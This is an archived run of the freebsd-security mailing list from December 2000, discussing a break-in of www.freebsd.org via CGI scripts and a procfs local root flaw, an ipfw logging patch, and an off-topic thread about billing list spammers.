Comment: For info see http://www.gnupg.org iQCVAwUBOjjiBVUuHi5z0oilAQGPTAP/azr4NoB6RZEgdY6N347d6Hgo4sCpLvuD 3B1EUesjNKMai4tuvj3x8MYriyg+DZQ4VxruHUsDBQvY5AgHKzlCezIbjy6Z+R4C owD08Hi/X0y8vuyf3nw5iKhJMRgwc0AmMIVv4VfSdya/KjpcRKeopORYbRnQOw3A Ru8qcF63zZw= =WrKi -----END PGP SIGNATURE----- --mP3DRpeJDSE+ciuQ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 7:48:45 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 07:48:43 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from secure.smtp.email.msn.com (cpimssmtpu07.email.msn.com [207.46.181.28]) by hub.freebsd.org (Postfix) with ESMTP id 8386E37B400; Thu, 14 Dec 2000 07:48:43 -0800 (PST) Received: from x86w2kl1 - 209.0.249.169 by email.msn.com with Microsoft SMTPSVC; Thu, 14 Dec 2000 07:48:42 -0800 Message-ID: <00c401c0666c$1f63cff0$9207c00a@local> From: "John Howie" To: "Kris Kennaway" , References: <20001214070649.A25429@citusc.usc.edu> Subject: Re: Details of www.freebsd.org penetration Date: Fri, 15 Dec 2000 07:53:32 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris, Any chance you could let us know exactly what 'local root vulnerability' was exploited. As I recall it was originally stated that no weakness in FreeBSD itself had been leveraged. I appreciate that the hacker gained access to the system via CGI (and not a FreeBSD weakness) but once in he/she became root through some other means. Was this vulnerability a configuration issue or simply a known problem that had not been addressed? Thanks, john... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 7:59:14 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 07:59:13 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from ns.shawneelink.net (ns.shawneelink.net [216.240.66.11]) by hub.freebsd.org (Postfix) with ESMTP id DE4DD37B400 for ; Thu, 14 Dec 2000 07:59:12 -0800 (PST) Received: from ns.shawneelink.net (ns.shawneelink.net [216.240.66.11]) by ns.shawneelink.net (8.10.1/8.10.1) with ESMTP id eBEFx7I06881 for ; Thu, 14 Dec 2000 09:59:07 -0600 (CST) Date: Thu, 14 Dec 2000 09:59:07 -0600 (CST) From: J Bacher X-Sender: jb@ns.shawneelink.net To: security@FreeBSD.ORG Subject: Re: Details of www.freebsd.org penetration In-Reply-To: <20001214070649.A25429@citusc.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 14 Dec 2000, Kris Kennaway wrote: > As promised, here are the details of the recent penetration of the > www.freebsd.org server. > > As several people guessed, the initial penetration involved weaknesses > in the CGI scripts running on the website. This gained control of user > nobody, and then a local root vulnerability was leveraged to gain root > access to the machine. > [stuff deleted] > The www cgi scripts have since been audited by several people for > other vulnerabilities, four of which were found and corrected (I don't This brings up an excellent point. It would be great if I could out-source the responsibility of reviewing [and optionally correcting] C or Perl code prior to making it available to webserver customers. Is there a centralized source of {reputable, qualified} individuals that provide this service? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 8: 9: 6 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 08:09:03 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from cam067213.student.utwente.nl (cam067213.student.utwente.nl [130.89.226.203]) by hub.freebsd.org (Postfix) with SMTP id 0A54437B400 for ; Thu, 14 Dec 2000 08:09:03 -0800 (PST) Received: (qmail 43341 invoked by uid 1001); 14 Dec 2000 17:10:57 -0000 Date: Thu, 14 Dec 2000 17:10:57 +0000 From: Frank van Vliet To: freebsd-security@freebsd.org Subject: Re: Details of www.freebsd.org penetration Message-ID: <20001214171057.A43310@root66.org> References: <20001214070649.A25429@citusc.usc.edu> <00c401c0666c$1f63cff0$9207c00a@local> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="pf9I7BMVVzbSWLtt" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00c401c0666c$1f63cff0$9207c00a@local>; from JHowie@msn.com on Fri, Dec 15, 2000 at 07:53:32AM -0000 Sender: karin@cam067213.student.utwente.nl Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --pf9I7BMVVzbSWLtt Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Dec 15, 2000 at 07:53:32AM -0000, John Howie wrote: > Any chance you could let us know exactly what 'local root vulnerability' = was > exploited. As I recall it was originally stated that no weakness in FreeB= SD > itself had been leveraged. I appreciate that the hacker gained access to = the > system via CGI (and not a FreeBSD weakness) but once in he/she became root > through some other means. Was this vulnerability a configuration issue or > simply a known problem that had not been addressed? Allthou we normaly only use weaknesses created by the server admins itself,= =20 like cgi scripts made by them and configurations, this time local root was gained by a local root exploit which was an 'error' of freebsd itself.=20 Advisory about it was promised to be send weeks ago, it is fixed in FreeBSD= 4.2 Kris, this would be a nice timing for that advisory? Frank van Vliet alias {} Joost Pol alias nohican =09 --=20 RooT66: http://root66.student.utwente.nl PGP Public Key: http://root66.student.utwente.nl/frank.pub.pgp --pf9I7BMVVzbSWLtt Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.1i iQA/AwUBOjj/IOv9YnvRDibSEQKcUwCgtGPA5tbrbZUb3ELlejS1Au+QQToAn0qC Ba9b7llF3q9lXdahRZbIYxWd =Rsx+ -----END PGP SIGNATURE----- --pf9I7BMVVzbSWLtt-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 8:26:59 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 08:26:57 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 5268237B400 for ; Thu, 14 Dec 2000 08:26:57 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id IAA26051; Thu, 14 Dec 2000 08:28:14 -0800 Date: Thu, 14 Dec 2000 08:28:14 -0800 From: Kris Kennaway To: John Howie Cc: security@freebsd.org Subject: procfs vulnerability (Re: Details of www.freebsd.org penetration) Message-ID: <20001214082814.A25963@citusc.usc.edu> References: <20001214070649.A25429@citusc.usc.edu> <00c401c0666c$1f63cff0$9207c00a@local> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="ZGiS0Q5IWpPtfppv" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <00c401c0666c$1f63cff0$9207c00a@local>; from JHowie@msn.com on Fri, Dec 15, 2000 at 07:53:32AM -0000 Sender: kris@citusc.usc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --ZGiS0Q5IWpPtfppv Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Dec 15, 2000 at 07:53:32AM -0000, John Howie wrote: > Kris, >=20 > Any chance you could let us know exactly what 'local root vulnerability' = was > exploited. As I recall it was originally stated that no weakness in FreeB= SD > itself had been leveraged. I appreciate that the hacker gained access to = the No, I said that it was not a vulnerability in FreeBSD which allowed the initial penetration. The attackers wouldn't have been able to get in if this was any old FreeBSD system that wasn't running dodgy CGI scripts. > system via CGI (and not a FreeBSD weakness) but once in he/she became root > through some other means. Was this vulnerability a configuration issue or > simply a known problem that had not been addressed? The latter :-( In fact it was a problem which was brought to our attention a few days prior by the same guys who did the penetration - unfortunately it's taken us rather longer than I would have liked to get it fixed and an advisory released, a combination of the people involved being busy travelling, or just busy. However we've finally got it all together, it seems, and so an advisory should be out on Monday. If I'd known how long it would take to get the problem fixed I would have released details informally before now - I can only apologise for the delay, although to my knowledge this vulnerability is not yet widely known - basically there are several local root exploits in procfs: wait for the advisory for more details, unmount procfs now on your multi-user systems. Kris --ZGiS0Q5IWpPtfppv Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6OPUeWry0BWjoQKURAjBAAJoCMiuv0BVNRDdQyW8IoWAp6JpSkwCeLurK NW+h1yBYhYDcDrC6jejY8mY= =sLQa -----END PGP SIGNATURE----- --ZGiS0Q5IWpPtfppv-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 12: 8:12 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 12:08:10 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from s2-c2.cnmnetwork.com (s2-c2.cnmnetwork.com [209.163.64.72]) by hub.freebsd.org (Postfix) with SMTP id 2EA6337B400 for ; Thu, 14 Dec 2000 12:08:10 -0800 (PST) Received: (qmail 21467 invoked from network); 14 Dec 2000 12:06:44 -0800 Received: from prometheus.cnmnetwork.com (HELO compton) (irc@209.79.28.5) by s2-c2.cnmnetwork.com with SMTP; 14 Dec 2000 12:06:44 -0800 Date: Thu, 14 Dec 2000 12:21:06 -0800 (PST) From: jrz Reply-To: jrz Subject: Re: procfs vulnerability (Re: Details of www.freebsd.org penetration) To: security@FreeBSD.org MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Content-MD5: Q6wHG/XziiQ7dh5fuW6rkA== X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.4 SunOS 5.8 i86pc i386 Message-Id: <20001214200810.2EA6337B400@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >unmount procfs now on >your multi-user systems. > >Kris Kris, What versions of FreeBSD is this affecting at this time? -jrz --- Jacob Zehnder | Systems Engineer CNM Network | http://www.cnmnetwork.com business: jrz@cnmnetwork.com other: jrz@rackmount.org --- "Where am I, and what am I doing in this handbasket?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 12:16:13 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 12:16:11 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 7A7F837B400 for ; Thu, 14 Dec 2000 12:16:10 -0800 (PST) Received: (qmail 28600 invoked by uid 0); 14 Dec 2000 20:16:08 -0000 Received: from p3ee2161f.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.31) by mail.gmx.net (mail06) with SMTP; 14 Dec 2000 20:16:08 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id UAA09885 for freebsd-security@freebsd.org; Thu, 14 Dec 2000 20:58:54 +0100 Date: Thu, 14 Dec 2000 20:58:54 +0100 From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: Extended ipfw Logging Message-ID: <20001214205854.J253@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: <20001214003219.K96105@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001214003219.K96105@149.211.6.64.reflexcom.com>; from cjclark@reflexnet.net on Thu, Dec 14, 2000 at 12:32:19AM -0800 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Dec 14, 2000 at 00:32 -0800, Crist J. Clark wrote: > > INTRODUCTION > > I wanted to add some detail to the ipfw logging. Specificially, > I wanted TCP flags. However, once I started coding, I decided > why not toss just about every field of interest in. I have > attached patches. > > > WHAT THE PATCHES DO > > There are new fields for all packets. Data from the IP header, > the IP ID, TTL, and extra fragmentation information is printed > for all types of datagrams. TCP packets include additional > information on sequence number, acknowledgement number, and > flags. Why not have the "verbosity" written in the matching rule? One surely doesn't want to bloat *all* logged entries (not even log all denials, and maybe log some accepted packets too). Expand the filter description for the log verbosity level and reference this field when the match is meant to log something. I'm not saying that ipf(4) is the cure for everything. But looking at "man 5 ipf" here's what I really like about it and you might, too: log = "log" [ "body" ] [ "first" ] [ "or-block" ] [ "level" loglevel ] . Although the above "loglevel" is different from your verbosity idea (it's a syslog facility.level pair) you might want to have the best of both worlds in ipfw(4) and code syslog levels as well as your verbosity controlling what packet characteristics to print out and where to do so? :) virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 13: 7:31 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 13:07:28 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from earth.wnm.net (earth.wnm.net [208.246.240.243]) by hub.freebsd.org (Postfix) with ESMTP id 36E9237B402 for ; Thu, 14 Dec 2000 13:07:28 -0800 (PST) Received: from localhost (alex@localhost) by earth.wnm.net (8.11.0/8.11.0) with ESMTP id eBEL8GP59074; Thu, 14 Dec 2000 15:08:16 -0600 (CST) Date: Thu, 14 Dec 2000 15:08:16 -0600 (CST) From: Alex Charalabidis To: jrz Cc: security@FreeBSD.ORG Subject: Re: procfs vulnerability (Re: Details of www.freebsd.org penetration) In-Reply-To: <20001214200810.2EA6337B400@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 14 Dec 2000, jrz wrote: > >unmount procfs now on > >your multi-user systems. > > > >Kris > > Kris, > > What versions of FreeBSD is this affecting at this time? > Jake, I'm going by the assumption that this is at least 4.x and probably 3.x too. That's what we expect the advisory to tell us, let him get the data together. We don't want him making any hasty announcements here under pressure and then posting something else in the advisory. -ac -- ============================================================== Alex Charalabidis (AC8139) 5050 Poplar Ave, Ste 170 System Administrator Memphis, TN 38157 WebNet Memphis (901) 432 6000 Author, The Book of IRC http://www.bookofirc.com/ ============================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 13:10:26 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 13:10:21 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 5C62937B698; Thu, 14 Dec 2000 13:10:21 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id NAA17576; Thu, 14 Dec 2000 13:10:11 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda17570; Thu Dec 14 13:10:04 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eBEL9xS10091; Thu, 14 Dec 2000 13:09:59 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdW10081; Thu Dec 14 13:09:00 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eBEL8wo04627; Thu, 14 Dec 2000 13:08:58 -0800 (PST) Message-Id: <200012142108.eBEL8wo04627@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdqQ4623; Thu Dec 14 13:08:47 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.2-RELEASE X-Sender: cy To: Kris Kennaway Cc: John Howie , security@FreeBSD.ORG Subject: Re: procfs vulnerability (Re: Details of www.freebsd.org penetration) In-reply-to: Your message of "Thu, 14 Dec 2000 08:28:14 PST." <20001214082814.A25963@citusc.usc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 14 Dec 2000 13:08:47 -0800 Sender: cy@uumail.gov.bc.ca Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20001214082814.A25963@citusc.usc.edu>, Kris Kennaway writes: > > --ZGiS0Q5IWpPtfppv > Content-Type: text/plain; charset=us-ascii > Content-Disposition: inline > Content-Transfer-Encoding: quoted-printable > > On Fri, Dec 15, 2000 at 07:53:32AM -0000, John Howie wrote: > > Kris, > >=20 > > Any chance you could let us know exactly what 'local root vulnerability' = > was > > exploited. As I recall it was originally stated that no weakness in FreeB= > SD > > itself had been leveraged. I appreciate that the hacker gained access to = > the > > No, I said that it was not a vulnerability in FreeBSD which allowed > the initial penetration. The attackers wouldn't have been able to get > in if this was any old FreeBSD system that wasn't running dodgy CGI > scripts. > > > system via CGI (and not a FreeBSD weakness) but once in he/she became root > > through some other means. Was this vulnerability a configuration issue or > > simply a known problem that had not been addressed? > > The latter :-( In fact it was a problem which was brought to our > attention a few days prior by the same guys who did the penetration - > unfortunately it's taken us rather longer than I would have liked to > get it fixed and an advisory released, a combination of the people > involved being busy travelling, or just busy. However we've finally > got it all together, it seems, and so an advisory should be out on > Monday. Has the fix been committed? If so, is it procfs_ctl.c 1.22? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 14:52:14 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 14:52:11 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from joe.halenet.com.au (joe.halenet.com.au [203.37.141.114]) by hub.freebsd.org (Postfix) with ESMTP id 9D4D437B402 for ; Thu, 14 Dec 2000 14:52:09 -0800 (PST) Received: from temp19 (modem-113-st.halenet.com.au [203.55.33.113]) by joe.halenet.com.au (8.9.1/8.9.1) with SMTP id GAA02778 for ; Fri, 15 Dec 2000 06:47:06 +1000 (EST) (envelope-from timbo@halenet.com.au) Message-ID: <012701c06620$e3f450c0$6500a8c0@halenet.com.au> From: "Tim McCullagh" To: Subject: OT Spamming on this list of late Date: Fri, 15 Dec 2000 08:54:52 +1000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi All, Of late there has been a degree of spamming using this and other FreeBSD lists. There has also been some discusion on how to prevent it. I just saw this on at the bottom of an email that was sent to me >>>>>>>>>> NOTICE: By sending unsolicited commercial advertising/solicitations (or otherwise on or as part of a mailing list) to the above e-mail address you will be indicating your consent to paying Danick Systems a Limited Liability Corporation and controller of this domain $10,000.oo U.S.D./hour for a minimum of 1 hour for my time spent dealing with it. Payment due in 30 days upon receipt of an invoice (e-mail or regular mail) from me or my authorized representative. <<<<<<<<<<< If it is legal to do this then this may be the solution. It may also help with some needed funds for the FreeBSD project at the expense of individuals and corporations misusing the list. Thanks for all the tips and replys to security related issues in 2000 Regards Tim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 15:11:34 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 15:11:32 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from icarus.cs.brandeis.edu (icarus.cs.brandeis.edu [129.64.3.180]) by hub.freebsd.org (Postfix) with ESMTP id 0785E37B400 for ; Thu, 14 Dec 2000 15:11:32 -0800 (PST) Received: from localhost (meshko@localhost) by icarus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id SAA08946; Thu, 14 Dec 2000 18:11:19 -0500 Date: Thu, 14 Dec 2000 18:11:19 -0500 (EST) From: Mikhail Kruk To: Tim McCullagh Cc: freebsd-security@FreeBSD.ORG Subject: Re: OT Spamming on this list of late In-Reply-To: <012701c06620$e3f450c0$6500a8c0@halenet.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: meshko@icarus.cs.brandeis.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org it'd be darn awesome if some judge would make precident of making someone pay after such warning. of course this will never happen. On the other hand if you make the amount more reasonable (like $50 or whatever you are getting paid at your job) you probably can take this to a court and win... > >>>>>>>>>> > NOTICE: By sending unsolicited commercial advertising/solicitations > (or otherwise on or as part of a mailing list) to the above e-mail > address you will be indicating your consent to paying Danick Systems > a Limited Liability Corporation and controller of this domain > $10,000.oo U.S.D./hour for a minimum of 1 hour for my time spent > dealing with it. Payment due in 30 days upon receipt of an invoice > (e-mail or regular mail) from me or my authorized representative. > <<<<<<<<<<< To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 15:18:47 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 15:18:44 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 9E8C037B400 for ; Thu, 14 Dec 2000 15:18:43 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id eBENHdX73671; Thu, 14 Dec 2000 18:17:39 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Thu, 14 Dec 2000 18:17:39 -0500 (EST) From: Rob Simmons To: Mikhail Kruk Cc: Tim McCullagh , freebsd-security@FreeBSD.ORG Subject: Re: OT Spamming on this list of late In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Maybe if the list uses some combination of orbs, rlb, rss, dul; restricts posting to subscribers; and makes any submissions on the website through forms and not mailto:'s it would help cut down on the spam. The blackhole lists could be optional, I just thought I'd throw them out :) Robert Simmons Systems Administrator http://www.wlcg.com/ On Thu, 14 Dec 2000, Mikhail Kruk wrote: > it'd be darn awesome if some judge would make precident of making someone > pay after such warning. > of course this will never happen. > On the other hand if you make the amount more reasonable (like $50 or > whatever you are getting paid at your job) you probably can take this to a > court and win... > > > >>>>>>>>>> > > NOTICE: By sending unsolicited commercial advertising/solicitations > > (or otherwise on or as part of a mailing list) to the above e-mail > > address you will be indicating your consent to paying Danick Systems > > a Limited Liability Corporation and controller of this domain > > $10,000.oo U.S.D./hour for a minimum of 1 hour for my time spent > > dealing with it. Payment due in 30 days upon receipt of an invoice > > (e-mail or regular mail) from me or my authorized representative. > > <<<<<<<<<<< > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 15:34:56 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 15:34:52 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id A579D37B400 for ; Thu, 14 Dec 2000 15:34:48 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id SAA81592; Thu, 14 Dec 2000 18:36:12 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Thu, 14 Dec 2000 18:36:12 -0500 (EST) From: Ralph Huntington To: Rob Simmons Cc: Mikhail Kruk , Tim McCullagh , freebsd-security@FreeBSD.ORG Subject: Re: OT Spamming on this list of late In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Could you PLEASE take this discussion off the list. Please. On Thu, 14 Dec 2000, Rob Simmons wrote: > Maybe if the list uses some combination of orbs, rlb, rss, dul; restricts > posting to subscribers; and makes any submissions on the website through > forms and not mailto:'s it would help cut down on the spam. The blackhole > lists could be optional, I just thought I'd throw them out :) > > Robert Simmons > Systems Administrator > http://www.wlcg.com/ > > On Thu, 14 Dec 2000, Mikhail Kruk wrote: > > > it'd be darn awesome if some judge would make precident of making someone > > pay after such warning. > > of course this will never happen. > > On the other hand if you make the amount more reasonable (like $50 or > > whatever you are getting paid at your job) you probably can take this to a > > court and win... > > > > > >>>>>>>>>> > > > NOTICE: By sending unsolicited commercial advertising/solicitations > > > (or otherwise on or as part of a mailing list) to the above e-mail > > > address you will be indicating your consent to paying Danick Systems > > > a Limited Liability Corporation and controller of this domain > > > $10,000.oo U.S.D./hour for a minimum of 1 hour for my time spent > > > dealing with it. Payment due in 30 days upon receipt of an invoice > > > (e-mail or regular mail) from me or my authorized representative. > > > <<<<<<<<<<< > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 15:42: 1 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 15:41:58 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from inetarena.com (ns1.inetarena.com [206.129.216.1]) by hub.freebsd.org (Postfix) with ESMTP id 8CE7737B400 for ; Thu, 14 Dec 2000 15:41:53 -0800 (PST) Received: from localhost (sparky@localhost) by inetarena.com (8.9.3/8.8.5) with ESMTP id PAA32577; Thu, 14 Dec 2000 15:41:32 -0800 Date: Thu, 14 Dec 2000 15:41:32 -0800 (PST) From: To: Mikhail Kruk Cc: Tim McCullagh , freebsd-security@FreeBSD.ORG Subject: Re: OT Spamming on this list of late In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 14 Dec 2000, Mikhail Kruk wrote: > it'd be darn awesome if some judge would make precident of making someone > pay after such warning. > of course this will never happen. Incidents like this have been handled successfully with this sort of plan and Judges have found for the plaintifs is these cases. Mainly the cases have to do with phone and junk snail mail. Here is what needs to happen to have a chance at success. If the spamming company is in the U.S. you would need to send a Certified Letter to that company explaining the details of the deal. The Certified Letter, since it must be signed for is your proof that the mail has been delivered. Then the letter must state why the charge is being made. In this case I would explain that this is a professional, non-profit email list, and that they are more than welcome to spam to it, if they are a sponcer. Then, make the terms of acceptance of being a sponcer the act of sending spam to the list. This notice will also need to be in the sign-up procedure for gaining access to the list. Basicly, you are setting up a sponcership from a for profit company to a non-profit organization. I would, and I just bet you a dollar there is one lawyer on this list, find a lawyer to write this up. ===================================================== Back in Santa School they taught me everything. Don't go HO HO HO it scares the little children. Don't promise anything and don't flirt with the moms. Remove the costume before you hit the bar. No, it don't feel like Christmas. local $_ = "0A72656B636148206C72655020726568746F6E41207473754A"; while(s/..$//) { print chr(hex($&)) } ===================================================== > On the other hand if you make the amount more reasonable (like $50 or > whatever you are getting paid at your job) you probably can take this to a > court and win... > > > >>>>>>>>>> > > NOTICE: By sending unsolicited commercial advertising/solicitations > > (or otherwise on or as part of a mailing list) to the above e-mail > > address you will be indicating your consent to paying Danick Systems > > a Limited Liability Corporation and controller of this domain > > $10,000.oo U.S.D./hour for a minimum of 1 hour for my time spent > > dealing with it. Payment due in 30 days upon receipt of an invoice > > (e-mail or regular mail) from me or my authorized representative. > > <<<<<<<<<<< > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 17:29:36 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 17:29:33 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id 8F3B337B400 for ; Thu, 14 Dec 2000 17:29:32 -0800 (PST) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id UAA31350 for ; Thu, 14 Dec 2000 20:29:31 